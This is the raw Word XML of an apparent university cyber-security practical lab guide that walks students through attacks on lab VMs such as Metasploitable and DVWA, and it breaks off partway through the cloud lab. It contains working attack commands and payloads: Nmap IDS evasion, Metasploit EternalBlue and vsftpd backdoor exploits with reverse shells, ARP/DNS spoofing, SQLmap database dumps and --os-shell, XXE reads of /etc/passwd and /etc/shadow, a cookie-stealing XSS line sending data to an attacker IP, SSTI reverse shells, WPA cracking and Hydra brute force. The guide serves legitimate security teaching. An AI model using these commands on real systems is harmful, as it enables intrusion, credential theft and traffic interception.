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CYS-253-MJ-P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"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Practical Lab Book — Student Reference Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="10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Command Explanations  |  Output Identification  |  Verification Checklists</w:t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S.Y.B.Sc. Cyber Security  •  Semester IV  •  AY 2025-2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="60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Savitribai Phule Pune University  |  ASM College, Pune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2C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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">HOW TO USE THIS GUIDE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This guide is divided into 6 labs. For every task you will find:</w:t>
            </w:r>
          </w:p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  • A command reference table — what each command and flag does</w:t>
            </w:r>
          </w:p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  • A GREEN box — what to write in your Observations section</w:t>
            </w:r>
          </w:p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  • A BLUE box — how to verify your output is correct</w:t>
            </w:r>
          </w:p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  • An ORANGE box — common errors and important notes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3864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LAB 1 — Advanced Network Penetration Testing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CO1: Perform advanced network pentesting including firewall evasion, IDS/IPS bypass, and exploitation of network vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 1.1 — Advanced Nmap Scanning with IDS/IPS Evasion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Command Reference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680"/>
        <w:gridCol w:w="1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Flag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ping 192.168.1.20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Tests basic network connectivity to target IP before scanning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Reply from 192.168.1.20: bytes=32 time&lt;1ms TTL=64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If you get replies the host is reachable. If Request timed out, check VM network settings.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nmap -p- 192.168.1.20 -v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Scans ALL 65535 ports (-p-) with verbose output (-v) for a full baseline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 of open/closed ports with service names and states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You should see at least ports 21,22,23,25,80,139,445 open on Metasploitable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nmap -f 192.168.1.20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-f fragments packets into 8-byte chunks to evade simple IDS signature matching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Same port list but packets appear fragmented in Wireshark capture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Open Wireshark simultaneously. Filter: ip.frag_offset &gt; 0 — fragmented packets should appear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nmap -D RND:5 192.168.1.20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-D adds 5 random decoy IPs so the real attacker IP is hidden among fake sources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Port scan results with multiple source IPs visible in IDS logs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 /var/log/snort or IDS console — you should see 6 different source IPs instead of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nmap -T1 192.168.1.20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-T1 (Sneaky) slows scan speed drastically to avoid rate-based IDS detection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Same ports found but scan takes several minutes instead of seconds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Compare time taken: -T5 takes ~30s, -T1 takes 5-15 min. Both should find same ports.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nmap -sI 192.168.1.50 192.168.1.20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-sI uses a 'zombie' idle host (192.168.1.50) to send probe packets so attacker IP is never seen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Port scan results attributed to zombie host IP, not attacker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 IDS logs — the zombie IP appears as the scanner, not 192.168.1.10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nmap -sV --version-intensity 9 192.168.1.20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-sV detects service versions; --version-intensity 9 tries all version probes for maximum detail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Port 21: vsftpd 2.3.4, Port 22: OpenSSH 4.7p1, Port 445: Samba 3.0.20 etc.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Version numbers must match known Metasploitable versions. Any 'unknown' means probe failed.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 1 in your lab book with these columns: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Port | Service | Version | State | Evasion Technique Used | Detected by IDS? (Yes/No/Partial)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Example row: 21 | FTP | vsftpd 2.3.4 | open | Fragment (-f) | No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Terminal showing nmap -sV output with version numbers visible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Wireshark capture showing fragmented packets when using -f flag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Note which technique was hardest for IDS to detect (usually -T1 or -sI)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HOW TO CHECK CORRECT OUTPUT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CORRECT output of nmap -p- on Metasploitable should show at minimum: ports 21,22,23,25,80,139,445,3306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CORRECT fragmentation: in Wireshark use filter 'ip.frag_offset &gt; 0' — you should see multiple small packets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CORRECT -D output: nmap shows same port results regardless of decoy — the PORTS found should be identical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WRONG: If nmap says '0 hosts up' — your target VM is off or on wrong network segment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WRONG: If -sI fails with 'idle scan zombie has changed IP' — choose a different zombie host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33C00" w:sz="4"/>
              <w:left w:val="single" w:color="833C00" w:sz="4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⚠ COMMON ERROR / NOTE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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The -sI (idle scan) requires a truly idle host. If 192.168.1.50 is busy/active it will not work.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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If nmap returns 'filtered' instead of 'open' for a port, a firewall rule is blocking you — this is EXPECTED behaviour, note it.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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Always run the basic -p- scan first to establish your baseline before testing evasion techniques.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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 1.2 — Exploiting SMB/SNMP/FTP with Metasploit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Command Reference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680"/>
        <w:gridCol w:w="1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Flag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msfconsole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Launches the Metasploit Framework interactive console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msf6 &gt; prompt appears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If you see 'msf6 &gt;' you are inside Metasploit. 'Command not found' means Metasploit is not installed.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use auxiliary/scanner/smb/smb_enumshares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Loads the SMB share enumeration module — lists all shared folders on target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Module prompt changes to: msf6 auxiliary(smb_enumshares) &gt;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Module name appears in the prompt. Type 'info' to confirm correct module is loaded.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set RHOSTS 192.168.1.20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Sets the target IP address for the module to attack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RHOSTS =&gt; 192.168.1.20 confirmation message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Type 'show options' to confirm RHOSTS is set correctly before running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run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Executes the currently loaded module against the configured target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 of SMB shares: [+] 192.168.1.20 - \\192.168.1.20\tmp ...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Output shows share names. [+] means found, [-] means failed. Metasploitable has /tmp, /home shares.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use exploit/windows/smb/ms17_010_eternalblue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Loads EternalBlue (MS17-010) exploit — the famous WannaCry vulnerability targeting SMB port 445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Module prompt changes to ms17_010_eternalblue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Type 'info' to see CVE number, affected versions, and rank (Excellent or Average)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set PAYLOAD windows/meterpreter/reverse_tcp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Sets the payload: Meterpreter reverse shell means target connects BACK to attacker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PAYLOAD =&gt; windows/meterpreter/reverse_tcp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Type 'show options' — both RHOSTS (target) and LHOST (your IP) must be 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use exploit/unix/ftp/vsftpd_234_backdoor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Loads exploit for vsftpd 2.3.4 backdoor — a deliberate backdoor in that FTP version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Module prompt changes to vsftpd_234_backdoor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Check: port 21 must be open and running vsftpd 2.3.4 (confirmed from Task 1.1 nmap scan)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meterpreter &gt; sysinfo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After shell gained: displays target system info — hostname, OS, architecture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Computer: metasploitable, OS: Linux 2.6.24, Arch: x86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Hostname should match target VM name. This PROVES you have shell access.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meterpreter &gt; getuid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Displays the current user your shell is running as on the target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Server username: root OR uid=0(root)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If you see 'root' the exploit fully succeeded. If you see a low-priv user, privilege escalation is needed.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 2 in your lab book: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Service | Port | Vulnerability | Exploit Module Used | Success (Yes/No) | Shell Gained (Yes/No)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For SMB: Service=SMB, Port=445, Vulnerability=EternalBlue MS17-010, Success=Yes, Shell=Yes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msfconsole running with 'run' output showing [*] Meterpreter session opened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meterpreter &gt; sysinfo output showing target OS info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meterpreter &gt; getuid output showing 'root' or user level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Write the CVSS score: MS17-010 = CVSS 9.3 (Critical). vsftpd backdoor = CVSS 10.0 (Critical)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HOW TO CHECK CORRECT OUTPUT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SUCCESS for EternalBlue: You see '[*] Meterpreter session 1 opened' and meterpreter &gt; prompt appears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SUCCESS for FTP backdoor: You get a shell prompt ($ or #) at 192.168.1.20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CORRECT sysinfo: Shows Linux kernel version and Metasploitable hostname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WRONG: 'Exploit completed but no session was created' — target may already be patched or port 445 is filtered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WRONG: 'Connection refused' on FTP — check port 21 is open first using: nmap -p 21 192.168.1.20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If EternalBlue fails: Metasploitable 2 is Linux-based. EternalBlue targets Windows. Note this in observations.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33C00" w:sz="4"/>
              <w:left w:val="single" w:color="833C00" w:sz="4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⚠ COMMON ERROR / NOTE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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IMPORTANT: EternalBlue (MS17-010) is a Windows exploit. Metasploitable 2 is Linux. If testing Windows Server target use that VM, not Metasploitable.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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If you see 'A session may have been created for another user' — type 'sessions -l' to list active sessions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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">To close a Meterpreter session type 'exit' then 'sessions -K' to kill all sessions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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 1.3 — MITM Attacks using Bettercap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680"/>
        <w:gridCol w:w="1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Flag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sudo bettercap -iface eth0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Launches Bettercap on the eth0 network interface in interactive mode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bettercap v2.x.x prompt appears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Interface name must match your actual adapter. Run 'ip a' to check — may be eth0 or ens33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set arp.spoof.targets 192.168.1.20 / arp.spoof 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Tells Bettercap which IP to spoof ARP for, then starts ARP poisoning to intercept traffic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[arp.spoof] targets: 192.168.1.20, ARP spoofing started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Run 'arp -a' on target machine. Gateway MAC should now be your attacker MAC — this confirms poisoning.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set dns.spoof.domains example.com / dns.spoof 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Redirects DNS queries for example.com to the attacker machine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[dns.spoof] example.com redirected to 192.168.1.10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 target: ping example.com — it should now ping 192.168.1.10 not the real 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http.proxy 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Starts HTTP proxy to intercept and inspect unencrypted HTTP traffic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[http.proxy] started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Any HTTP (not HTTPS) request from target will now be visible in Bettercap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events.log /tmp/mitm_log.txt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Saves all intercepted events to a log file for documentation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Log file created at /tmp/mitm_log.txt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After session: cat /tmp/mitm_log.txt — you should see all captured events with timestamps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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 3 in your lab book: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Timestamp | Protocol | Source IP | Dest IP | Request Type | Response Code | Sensitive Data Captured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Example: 10:15:45 | HTTP | 192.168.1.20 | 192.168.1.100 | POST /login | 302 | Username visible in plain text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Bettercap terminal showing intercepted HTTP traffic with credentials or query visible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arp -a output on TARGET machine showing spoofed gateway MAC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Note: Only HTTP traffic is visible. HTTPS traffic will show as encrypted — this is correct.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HOW TO CHECK CORRECT OUTPUT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ARP SPOOF WORKING: On target machine run 'arp -a' — the gateway (192.168.1.1) MAC should match your Kali MAC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HTTP INTERCEPT WORKING: Browse to any http:// site on target — Bettercap terminal shows the request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DNS SPOOF WORKING: ping example.com from target returns 192.168.1.10 not real IP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WRONG: If no traffic appears — check arp.spoof is actually ON using 'net.show'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WRONG: If HTTPS traffic shows as garbled/encrypted — this is CORRECT behaviour. HTTPS is protected against MITM.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33C00" w:sz="4"/>
              <w:left w:val="single" w:color="833C00" w:sz="4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⚠ COMMON ERROR / NOTE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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Use DVWA (http:// not https://) as the target application to generate capturable HTTP traffic.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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Never run MITM tools on real networks. Lab environment only.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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If Bettercap crashes: sudo bettercap -iface eth0 -caplet http-ui to use the web UI instead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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 1.4 — DNS Spoofing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680"/>
        <w:gridCol w:w="1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Flag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set dns.spoof.domains google.com,facebook.com / set dns.spoof.address 192.168.1.10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Tells Bettercap to intercept DNS queries for these domains and return attacker IP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Domains registered for spoofing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Verify: nslookup google.com on target — should return 192.168.1.10 instead of real Google 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sudo python3 -m http.server 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Starts a simple web server on port 80 on attacker machine — spoofed victims will land here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Serving HTTP on 0.0.0.0 port 80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Browse to http://192.168.1.10 from target — you should see directory listing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sudo wireshark -i eth0 -f 'dns'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Opens Wireshark capturing only DNS packets on eth0 interface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Wireshark window opens with live DNS traffic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DNS queries from target appear as green rows. Look for query for google.com answered with your IP.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 4 in your lab book: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Time | Client IP | Query (Domain) | Original Answer (real IP) | Spoofed Answer (192.168.1.10) | Status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For DNSSEC-protected domains (e.g. youtube.com) — Status = Failed. This is EXPECTED. Note it.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Wireshark capture showing DNS query and spoofed response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Browser on target showing fake page at 192.168.1.10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Note: DNSSEC prevents spoofing. Write this as a finding in your security recommendations.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HOW TO CHECK CORRECT OUTPUT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SUCCESS: nslookup google.com on target returns 192.168.1.10 — not 172.217.x.x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SUCCESS: Wireshark shows DNS answer with your IP for spoofed domains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DNSSEC protection: youtube.com and some others will NOT be spoofed — this is correct, write it in observations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WRONG: If nslookup still returns real IP — check dns.spoof is on and ARP spoofing is active first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3864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LAB 2 — Web Application Exploitation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CO2: Conduct in-depth web application security assessments using SQLi, XXE, SSRF, XSS, CSRF, SSTI.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Target application: DVWA at http://192.168.1.20/dvwa/ — Login: admin / password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 2.1 — SQL Injection using SQLmap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680"/>
        <w:gridCol w:w="1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Flag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admin' OR '1'='1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Classic SQL injection test in login form. The OR '1'='1' always evaluates to TRUE, bypassing password check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Logged in as admin without correct password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If you see 'Welcome admin' without entering real password — injection is working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sqlmap -u "http://.../sqli/?id=1&amp;Submit=Submit" --dbs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--dbs flag tells SQLmap to list all databases after detecting the injection point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Available databases: [*] dvwa [*] information_schema [*] mysql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At least 'dvwa' and 'information_schema' must appear. SQLmap also shows injection type found.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sqlmap ... -D dvwa --tables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-D dvwa selects the 'dvwa' database; --tables lists all tables inside it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Database: dvwa — Tables: guestbook, users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Two tables should appear: 'users' (has credentials) and 'guestbook'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sqlmap ... -D dvwa -T users --dump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-T users selects the users table; --dump extracts ALL data from it including usernames and password hashes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Table: users — id, user, password, first_name, last_name, avatar columns with data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You should see admin, gordonb, 1337, pablo, smithy as users with their MD5 password hashes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sqlmap ... --os-shell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If DB user has FILE privileges, this attempts to get an OS command shell on the server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os-shell&gt; prompt appears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Type 'id' at os-shell&gt; — if it returns uid=33(www-data) you have command execution. This is highest impact.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Note the injection TYPE that SQLmap found — usually 'boolean-based blind', 'time-based blind', or 'UNION query-based'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Record all database names found by --dbs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Record all table names found in dvwa database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SQLmap output showing 'Parameter id is vulnerable' confirmation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The dumped users table showing usernames and password hashes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os-shell output (if achieved) showing 'id' command result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Note: MD5 hashes in the password column look like: 5f4dcc3b5aa765d61d8327deb882cf99 (this is MD5 of 'password')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HOW TO CHECK CORRECT OUTPUT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SQLmap confirms vulnerability with: '[CRITICAL] parameter id is vulnerable'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Database dump SUCCESS: you see username 'admin' and a 32-character MD5 hash string in the users table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To verify an MD5 hash: echo -n 'password' | md5sum — if it matches the dumped hash, you have the plaintext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WRONG: 'all tested parameters do not appear to be injectable' — check DVWA security level is set to 'Low' in DVWA settings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WRONG: 403 Forbidden — make sure you are logged into DVWA first and copy your session cookie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33C00" w:sz="4"/>
              <w:left w:val="single" w:color="833C00" w:sz="4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⚠ COMMON ERROR / NOTE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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Set DVWA security to 'Low' before starting (DVWA Settings &gt; Security Level &gt; Low &gt; Submit)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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If SQLmap asks 'do you want to test this parameter?' — type Y and press Enter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833C00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The --os-shell may not work if the web server process does not have write permissions. Note this as a finding.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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 2.2 — XXE (XML External Entity) Exploitation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680"/>
        <w:gridCol w:w="1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Flag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&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM 'file:///etc/passwd'&gt;]&gt;&amp;xxe;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 DOCTYPE declares an external entity named 'xxe' pointing to /etc/passwd. When &amp;xxe; is referenced the server reads and returns the file.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Contents of /etc/passwd appear in the response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Look for 'root:x:0:0:root:/root:/bin/bash' in response — this is the first line of /etc/passwd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Burp Suite Intercept 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Burp Suite proxy intercepts the HTTP request between browser and server so you can modify the XML body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Burp shows the raw HTTP request with XML body in Repeater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 Burp Proxy tab — you should see the raw POST request. Right-click and 'Send to Repeater' to modify and resend.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file:///etc/shadow (Out-of-Band XXE)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Attempts to read the shadow password file which contains hashed user passwords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Shadow file contents in response (if permissions allow)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If you get 'Permission denied' that is expected — www-data user cannot read /etc/shadow. Note this.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Burp Suite Repeater showing the XXE payload in the request and /etc/passwd content in the response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Record which files were successfully read: /etc/passwd (usually YES), /etc/shadow (usually NO — permission denied)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Note the first 3 lines of /etc/passwd output — shows system users like root, daemon, www-data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Write in analysis: In-Band XXE = file contents returned directly in HTTP response. Out-of-Band XXE = data sent to external server.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HOW TO CHECK CORRECT OUTPUT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SUCCESS: Response body contains 'root:x:0:0' which is the first line of /etc/passwd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SUCCESS: Response Content-Type changes from JSON/HTML to the raw file content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WRONG: If you see the literal text &amp;xxe; in the response — server is not processing external entities (XXE is patched)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WRONG: 'Connection refused' to external DTD server — Out-of-Band XXE requires an internet-accessible server to receive data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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 2.3 — SSRF Exploitation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680"/>
        <w:gridCol w:w="1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Flag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?url=http://127.0.0.1:3306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SSRF payload: makes the SERVER send a request to its own port 3306 (MySQL). You cannot access 127.0.0.1 from your browser but the server can.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MySQL banner or error message returned from server's own MySQL port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If response contains 'mysql' or version string — SSRF works. If 'Connection refused' — port is closed.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?url=http://192.168.1.20/admin/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Makes server request its own admin panel — tests if internal-only paths are accessible via SSRF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Admin page HTML returned in the response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Look for admin panel HTML in response. This page would be blocked if accessed directly from your browser.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?url=http://192.168.1.20:PORT (22, 80, 3306, 5432)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Port scanning via SSRF: server probes its own ports and returns different responses for open vs closed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Different response times or error messages for open vs closed ports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Open port: fast response with banner. Closed port: fast 'Connection refused'. Filtered: slow timeout (30+ seconds).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✔ WHAT TO WRITE IN YOUR OBSERVATION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Record each URL tested and the server response received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Note response time differences — open ports respond in &lt; 1 second, filtered ports timeout after 30+ seconds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The URL parameter modified in Burp and the response showing internal service data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In analysis: explain that 127.0.0.1 requests come FROM the server so firewall rules that block external access are bypassed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HOW TO CHECK CORRECT OUTPUT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SUCCESS: Port 80 response returns the web server HTML (same content as direct browser access)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SUCCESS: Port 3306 response returns MySQL protocol banner data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WRONG: All ports return same response — the application may not be vulnerable or is sanitizing the URL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To identify open vs closed: compare response body length. Open ports return more data than closed ones.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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 2.4 — XSS and CSRF Attacks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680"/>
        <w:gridCol w:w="1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Flag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&lt;script&gt;alert('XSS')&lt;/script&gt; in URL parameter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Reflected XSS test: if the input is echoed back unsanitised, the script runs in the victim's browser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Alert popup box appears with text 'XSS'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If the alert box pops up — reflected XSS is confirmed. Screenshot the popup with URL visible.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&lt;script&gt;document.location='http://192.168.1.10/?c='+document.cookie&lt;/script&gt;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Stored XSS that steals session cookies: when any user views this stored comment, their cookie is sent to attacker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Attacker web server (python http.server) receives GET request with cookie data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 attacker terminal: you should see '?c=PHPSESSID=abc123...' in the access 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CSRF HTML form (auto-submit to target)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CSRF: a malicious page hosted by attacker auto-submits a form to the target site using the victim's active session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If victim visits malicious page while logged into target, action executes without their knowledge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Look for the action being performed in the target app — e.g. admin password changed or funds transferred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✔ WHAT TO WRITE IN YOUR OBSERVATION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For XSS: record type (Reflected vs Stored), the payload used, and the result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Alert popup visible with the full URL in the browser address bar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Attacker's python http.server terminal showing cookie received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For CSRF: document the action that was performed and whether the victim saw any visible sign of it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In analysis: Stored XSS is more dangerous than Reflected because it persists and hits every user who views the page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HOW TO CHECK CORRECT OUTPUT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Reflected XSS confirmed: alert(XSS) popup appears when your crafted URL is visited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Stored XSS confirmed: cookie appears in attacker log EVEN WHEN a different user (different browser/session) views the page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CSRF confirmed: the action (e.g. password change) happens when victim visits the malicious page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WRONG: Alert says 'undefined' — cookie is empty. Check document.cookie path or use document.cookie+location.href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WRONG: No request in http.server log — check your attacker IP is reachable from target (ping test)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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 2.5 — Server-Side Template Injection (SSTI)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680"/>
        <w:gridCol w:w="1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Flag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{{7*7}} in input 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Basic SSTI probe: if the template engine evaluates this expression and returns 49 instead of the literal text {{7*7}}, the field is vulnerable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Output shows 49 (not the text '{{7*7}}')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This is your FIRST check. If output = 49 then SSTI is confirmed. If output = {{7*7}} then no SSTI.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{{7*'7'}}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Engine fingerprinting: Jinja2 returns 7777777 (repeats string 7 times). Twig/PHP returns 49. Response tells you which engine is in use.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Jinja2: 7777777 | Twig: 49 | ERB/Ruby: error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This tells you WHICH template engine to write your exploit for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{{config.items()}}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Jinja2 specific: dumps all application configuration including secret keys, database URLs, debug mode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Long list of config key-value pairs including SECRET_KEY, DATABASE_URI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Look for SECRET_KEY in output — this is a critical finding that allows session forgery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Reverse shell via SSTI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 RCE payload: executes OS command via Python subprocess through template injection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Reverse shell connection received on attacker's nc listener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Set up listener first: nc -lvnp 4444, then trigger payload. Listener should show connection from target.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Start with {{7*7}} — record whether output is 49 (vulnerable) or literal text (not vulnerable)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Then try {{7*'7'}} to identify the template engine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Input field showing {{7*7}} submitted and page output showing 49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config.items() output showing application secrets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Reverse shell received in netcat listener (if achieved)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In analysis: SSTI is critical because it gives full server code execution — rated CVSS 9.8+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HOW TO CHECK CORRECT OUTPUT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{{7*7}} = 49 in output confirms SSTI — this is the single most important verification step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{{7*'7'}} = 7777777 confirms Jinja2 engine — use Jinja2-specific payloads from here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RCE confirmed: commands typed in nc listener execute on target server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WRONG: Output shows {{7*7}} literally — no SSTI. Try different delimiters: ${7*7}, &lt;%= 7*7 %&gt;, #{7*7}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WRONG: Reverse shell keeps closing — add 'exec bash' or use bash -i persistent shell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3864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LAB 3 — Wireless and IoT Hacking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CO3: Analyse and exploit security flaws in wireless networks and IoT devices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 3.1 — WPA2/WPA3 Cracking with Aircrack-ng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680"/>
        <w:gridCol w:w="1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Flag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sudo airmon-ng start wlan0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Puts the wireless adapter into monitor mode — required to capture all nearby Wi-Fi traffic, not just traffic addressed to you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Interface 'wlan0mon' created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Run 'iwconfig' — you should see wlan0mon with Mode:Monitor. If still shows Mode:Managed, monitor mode failed.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sudo airodump-ng wlan0mon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Scans all visible Wi-Fi networks showing BSSID (router MAC), channel, encryption type, and connected clients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Table showing all nearby APs with BSSID, CH, ENC, ESSID columns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Look for your target lab AP. Note its BSSID and Channel before proceeding.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sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture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--bssid focuses on one AP, -c 6 locks to channel 6, -w capture saves packets to capture.cap for cracking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Focused capture on target AP showing connected clients in lower section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Capture file created. Run 'ls -la' — you should see capture-01.cap, capture-01.csv,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sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon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Sends 10 deauthentication frames to disconnect all clients from the AP — forces them to reconnect and capture the 4-way handshake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 deauth frames sent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 the airodump-ng window: look for 'WPA handshake: AA:BB:CC:DD:EE:FF' in top-right corner — this confirms capture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sudo aircrack-ng -w wordlist.txt capture-01.cap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-w specifies the wordlist file. Aircrack tests each password against the captured handshake hash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KEY FOUND! [ password123 ] or 'Passphrase not in dictionary'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KEY FOUND means cracking succeeded. The password appears in square brackets. Time taken depends on wordlist size and CPU.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Record: Target BSSID, ESSID (network name), Channel, Encryption type (WPA/WPA2/WPA3)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airodump-ng showing 'WPA handshake: [BSSID]' message — this confirms capture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aircrack-ng output showing 'KEY FOUND!' with password visible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Note time taken to crack the password and size of wordlist used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WPA3 note: Write that WPA3 uses SAE (Simultaneous Authentication of Equals) which prevents offline dictionary attacks — this is a security improvement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HOW TO CHECK CORRECT OUTPUT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HANDSHAKE CAPTURED: airodump-ng top-right shows 'WPA handshake: XX:XX:XX:XX:XX:XX'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CRACK SUCCESS: aircrack-ng shows 'KEY FOUND! [ thepassword ]' — test the password on the AP to fully verify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WRONG: 'Passphrase not in dictionary' — the password is not in your wordlist. Use a larger wordlist like rockyou.txt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WRONG: 'No valid WPA handshakes found' — deauth did not work. Wait for a client to naturally reconnect, or repeat deauth.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WRONG: wlan0mon not created — your wireless adapter may not support monitor mode. Check with 'airmon-ng check'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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 3.2 — IoT Device Exploitation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680"/>
        <w:gridCol w:w="1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Flag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sudo nmap -p 80,443,8080,8443 192.168.1.0/24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Scans the entire subnet for devices with common web management ports — finds IoT devices with web interfaces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 of devices with open HTTP/HTTPS ports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Any device with port 8080 open is likely an IoT device. Check if it has a web login page.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hydra -l admin -P wordlist.txt telnet://192.168.1.50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Brute-force password attack on the target device's Telnet port using common passwords in wordlist. -l admin sets the username.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[192.168.1.50][telnet] login: admin password: admin123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SUCCESS: Hydra shows the working password. WRONG: '0 of 1 completed, 0 valid password' = not found in wordlist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binwalk firmware.bin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Extracts and analyses firmware binary file — identifies embedded filesystems, compressed data, and executable code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 of offsets with file types: JFFS2 filesystem, gzip compressed data, ELF executable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Look for filesystem entries (JFFS2, SquashFS, cramfs) — these contain the actual OS and configuration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http://[IP]/api/command?cmd=ls+-la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Command injection test: if the API passes URL parameters directly to OS commands without sanitisation, ls -la runs on the server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Directory listing of the server filesystem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If you see file listings (/bin, /usr, /etc etc.) — command injection is confirmed. This is a critical vulnerability.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✔ WHAT TO WRITE IN YOUR OBSERVATION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List all IoT devices discovered on the subnet with their IPs and open ports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For default credential test: record which username/password combination worked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Hydra output showing successful login with password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Command injection URL in browser and directory listing in response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Note firmware analysis findings: any hardcoded passwords, outdated library versions, or default credentials found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HOW TO CHECK CORRECT OUTPUT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Default creds found: Hydra shows '[telnet] login: admin   password: [password]'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Command injection: directory listing or file contents appear where normal text should be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WRONG: Hydra 'Connection refused' — device Telnet port is not 23, check with nmap -p- first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WRONG: Binwalk shows nothing — try binwalk -e firmware.bin to force extraction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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 3.3 — Bluetooth and RFID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680"/>
        <w:gridCol w:w="1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Flag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bluetoothctl / scan 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Opens the Bluetooth control interface and starts scanning for nearby Bluetooth devices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 of discovered devices with MAC addresses and names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Devices appear as: [NEW] Device XX:XX:XX:XX:XX:XX DeviceName. Note the MAC of your target device.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pair [MAC] / connect [MAC]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Attempts to pair with and connect to the target Bluetooth device — exploits default or no-PIN pairing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Pairing successful / Connection successful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Run 'info [MAC]' after connecting — if it shows 'Connected: yes' and 'Paired: yes' the connection is established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Proxmark3 RFID read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Reads data from RFID cards (key cards, access badges) in close proximity using the Proxmark3 hardware tool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Card UID, card type, and raw data bytes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 UID is a unique identifier — record it. If you can read it you can potentially clone it.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✔ WHAT TO WRITE IN YOUR OBSERVATION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List all Bluetooth devices discovered with their MAC addresses and device names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Record connection status: paired and connected, or failed with error message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For RFID: record the card UID, card type (Mifare Classic, HID, etc.), and raw data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bluetoothctl output showing device list and connection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Note: Many modern devices require explicit user confirmation for pairing — write this as a security control observation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3864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LAB 4 — Cloud Security Assessment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CO4: Assess security risks in AWS/Azure/GCP and identify misconfigurations.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Note: All tasks use an AWS lab account or LocalStack/mock environment. NEVER test on real production AWS accounts without explicit written permission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 4.1 — AWS S3 Bucket Enumeration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680"/>
        <w:gridCol w:w="1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Flag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aws configure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Sets up AWS CLI with your access key, secret key, and default region — required before any AWS CLI commands will work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Prompts for: Access Key ID, Secret Access Key, Region, Output format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Run 'aws sts get-caller-identity' after setup — it should return your account ID and username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aws s3 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Lists all S3 buckets in the authenticated account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 of bucket names with creation dates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Each bucket name is unique globally. Record all bucket names for further testing.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aws s3 ls s3://bucket-name/ --no-sign-request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--no-sign-request tests PUBLIC access — simulates an unauthenticated attacker. If it returns files, the bucket is publicly readable (CRITICAL finding).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File listing if public, AccessDenied if private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If files are listed without authentication — this is a misconfiguration. Note as CRITICAL severity finding.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aws s3api get-bucket-acl --bucket bucket-name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Retrieves the Access Control List for the bucket — shows who has what permissions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JSON output showing Grants with Grantee and Permission fields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Look for 'AllUsers' or 'AuthenticatedUsers' in Grantee — either means the bucket is over-exposed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aws s3 cp s3://bucket-name/file.txt . --no-sign-request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Attempts to download a file from the bucket without authentication — confirms data is actually accessible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Download: file.txt of size X bytes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If file downloads successfully without credentials — sensitive data is exposed. Screenshot the 